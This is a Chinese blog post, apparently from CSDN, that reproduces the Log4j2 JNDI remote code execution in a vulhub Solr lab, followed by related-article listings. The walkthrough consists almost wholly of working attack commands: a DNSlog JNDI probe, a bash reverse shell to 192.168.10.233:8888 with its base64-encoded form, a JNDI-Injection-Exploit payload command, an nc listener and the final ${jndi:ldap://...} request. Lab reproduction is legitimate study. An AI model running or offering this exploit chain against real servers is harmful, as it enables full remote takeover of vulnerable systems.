远程代码执行-Log4j2漏洞

cc775210

于 2024-09-08 14:34:19 发布

阅读量326

点赞数 4

文章标签： log4j

本文链接：https://blog.csdn.net/2401_82451607/article/details/142025773

版权

1.在vulhub中打开环境

进入环境所在的文件打开环境

docker-compose up -d

2.浏览器访问打开环境

3.使用dnslog查看是否存在漏洞

solr/admin/cores?action=${jndi:ldap://${sys:java.version}.9dbu98.dnslog.cn

发现可以返回java版本说明存在漏洞

4.开始反弹shell

下载jdni放到攻击机

反弹shell

bash -i >& /dev/tcp/192.168.10.233/8888 0>&1

反弹shell经过base-64编码

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjIzMy84ODg4IDA+JjE=

最终payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjIzMy84ODg4IDA+JjE=

}|{base64,-d}|{bash, -i}" -A "192.168.10.233"

5.服务器监听

nc -lvvp 8888

6.使用jdk1.8的payload直接访问

/solr/admin/cores?action=${jndi:ldap://192.168.10.233:1389/o2qeea} ${jndi:ldap://192.168.10.233:8888/uma7pn}

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

cc775210

关注关注

4
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

Apache Log4j2 远程代码执行漏洞检测工具

12-15

针对这个漏洞，开发出了专门的Apache Log4j2远程代码执行漏洞检测工具，这些工具包括针对Windows和Linux操作系统的版本。这些工具的主要目的是帮助管理员和安全专家迅速识别其环境中是否存在易受攻击的Log4j2实例。 ...

logging-log4j2-log4j-2.15.0-rc2.zip maven 资源库

12-31

针对Log4j 2 远程代码执行漏洞，需要用到的升级资源包，适用于maven资源库，包括log4j，log4j-core，log4j-api，log4j-1.2-api，log4j-jpa等全套2.15.0 maven资源库jar包。如果是maven本地仓库使用，需要将zip包解压...

参与评论您还未登录，请先登录后发表或查看评论

log4j2反序列化漏洞

败在我手中之敌，从来不会被我视为对手，我给你时间追赶，直至你遥望不见。

07-02

570

Log4j 是一个流行的Java日志框架，用于记录应用程序的日志信息并进行日志管理。它提供了高度可配置的日志输出，可以将日志信息输出到控制台、文件、数据库等多种目标。它采用了模块化的架构，包含多个组件，如日志器(Logger)、输出器(Appender)、格式器(Layout)、过滤器(Filter)等。这些组件可以根据需要进行配置和组合，以满足各种日志记录需求。

log4j2反序列化漏洞复现

网络战争的博客

09-06

攻击者可以使用更复杂的payload来执行更危险的操作，例如获取敏感数据或操纵服务器上的应用程序。如果攻击成功，将在服务器上执行payload中的命令。log4j2反序列化漏洞是一种Java反序列化漏洞，攻击者可以利用此漏洞在受害服务器上执行任意代码。这个payload将在服务器上执行一个命令（touch /tmp/success），攻击者可以用自己的恶意代码替换它。1. 构建恶意的序列化payload。攻击者可以构造一个HTTP请求，将payload发送到服务器上的Log4j2组件。

Log4j2 反序列化漏洞原理与复现

FisrtBqy的博客

05-15

4389

Log4j2 RCE漏洞原理与复现

框架漏洞---＞Log4j2 && Shiro1.2.4反序列化基础

huohaowen的博客

03-06

1387

本文涉及log4j2 ，反序列化基础，Kerberos，Docker

代码执行漏洞-Log4j2漏洞

最新发布

shw_yzh的博客

09-06

1264

代码执行漏洞-Log4j2漏洞

解决Apache Log4j 远程代码执行漏洞log4j2部分jar

12-10

解决Apache Log4j 远程代码执行漏洞log4j2部分jar，包含log4j-1.2-api-2.15.0.jar，log4j-api-2.15.0.jar，log4j-core-2.15.0.jar，log4j-to-slf4j-2.15.0.jar

logging-log4j2-log4j-2.15.0-rc2.zip

12-13

- **安全补丁**：此版本主要针对CVE-2021-44228的安全漏洞进行了修复，这是一个非常严重的问题，可能导致远程代码执行。Log4j 2.15.0-rc2及时响应，通过更新解决了这个问题，保障了系统的安全性。 - **性能优化**...

logging-log4j2-log4j-2.16.0-rc1.zip

12-13

这次我们关注的是"logging-log4j2-log4j-2.16.0-rc1.zip"这个压缩包，它包含了Log4j 2.16.0的Release Candidate 1版本，主要目的是修复一个严重漏洞，该漏洞可能导致远程代码执行（RCE）。首先，我们需要了解Log4j...

Log4j2漏洞详解（自学）

m0_64481831的博客

03-05

1825

Log4j2是Apache下的流行的Java日志框架，用于记录应用程序的日志信息并进行日志管理。它提供了高度可配置的日志输出，可以将日志信息输出到控制台、文件、数据库等多种目标，被应用于业务系统开发，用于记录程序输入输出日志信息。Log4j2是Apache的日志框架，用来记录和管理日志信息的。Log4j2漏洞的原理是因为默认支持解析LDAP/RMI协议，且使用了占位符如{}，并会解析里面的内容进行替换，所以攻击者就可以利用这一点构建特殊的恶意的占位符来进行攻击。

【Java小姿势】Log4j2漏洞的前世今生

行雨斋

12-20

2915

A.源起 2021年12月9日，各大公司都被一个重量级漏洞引爆了，该漏洞一旦被攻击者利用就会造成及其严重的影响。经过快速分析和确认，该漏洞影响范围极其广泛，危害极其严重。然后从10日凌晨开始很多公司的程序员都被迫开始应急相应，加班加点修复问题。该漏洞涉及包含但不限于Struts2、Flink、ElasticSearch、Druid、dubbo、Redis、kafka等常用应用和组件。爆出这个漏洞的这就是大名鼎鼎的日志组件log4j2 。作为日志组件，在java领域基本上是再常见运用不过的了，而这个漏洞可以

log4j2漏洞复现以及解决方案

学习不止境的博客

08-10

4498

log4j2漏洞解决 rmi远程调用 jndi注入 lookup

log4j2远程代码执行漏洞原理与漏洞复现（基于vulhub，保姆级的详细教程）

Bossfrank的博客

04-14

3万+

本文是log4j2远程代码执行漏洞原理和漏洞复现的详细说明。基于vulhub搭建靶场，攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能，在{}内使用了了JNDI注入的方式，通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码（.class），最终造成了远程代码执行。

【log4j2漏洞复现与利用】

热门推荐

一个程序员

01-31

4万+

log4j2

log4j反序列化漏洞详解及利用

Mr.Wang的博客

12-20

1万+

Log4j漏洞详解：带你体验一把hacker之路！

log4j反序列化漏洞分析(CVE-2019-17571)

杭州七先生的个人博客

04-07

1万+

前言 Apache Log4j反序列化漏洞影响版本 1.2.4 <= Apache Log4j <= 1.2.17 漏洞复现 idea新建一个项目，如下图所示： log4j: import org.apache.log4j.net.SimpleSocketServer; public class log4j { public static void main(String[] args) { System.out.println("Listening on port

Log4j2漏洞发展历程及解决方案

weixin_42803243的博客

02-08

1592

log4j最新修复方案 1.17.0 及发展历史

[20][03][81] Log4j 反序列化漏洞(CVE-2019-17571)

安全新司机

12-16

1588

文章目录1. 组件基本信息1.1 pom 信息1.2 影响版本1.3 漏洞场景2. 漏洞复现2.1 引入pom组件2.2 新建 log4j.properties2.3 Log4jLeak 代码2.4 下载 ysoserial.jar2.5 生成 playload2.5 启动程序3. 漏洞源码分析3.1 SimpleSocketServer 类3.2 SocketNode 类4. 反射到外网 1. 组件基本信息 1.1 pom 信息 <groupId>log4j</groupId> &

apache log4j2远程代码执行漏洞检测工具

08-31

Apache Log4j2远程代码执行漏洞是一种影响Apache Log4j2日志记录库的严重安全漏洞。该漏洞允许攻击者通过发送特制的网络请求，远程执行任意代码，导致服务器完全被控制。为了帮助检测这个漏洞，一些安全公司和社区为用户提供了相关工具。这些工具可以扫描用户的服务器和应用程序，检测是否受到Apache Log4j2远程代码执行漏洞的威胁。这些工具通常会发送特定的请求来触发漏洞，并检查服务器的日志文件或响应，以确定是否存在漏洞。如果漏洞存在，工具将提供警告或报告，并建议相应的修复措施。除了工具之外，用户还可以手动检查漏洞。他们可以通过编辑Log4j2的配置文件，将关键性日志记录功能设置为丢失或关闭。关闭该功能可以阻止攻击者利用漏洞，但也可能导致一些日志记录功能的失效。为了更好地保护服务器和应用程序，用户应该尽快更新Apache Log4j2到最新版本。此外，他们还应该保持注意，及时关注安全更新和公告，并及时采取相应措施。总之，Apache Log4j2远程代码执行漏洞检测工具是一种帮助用户发现漏洞并提供修复建议的工具。用户可以使用这些工具进行定期扫描，发现并处理潜在的漏洞，以提高系统的安全性。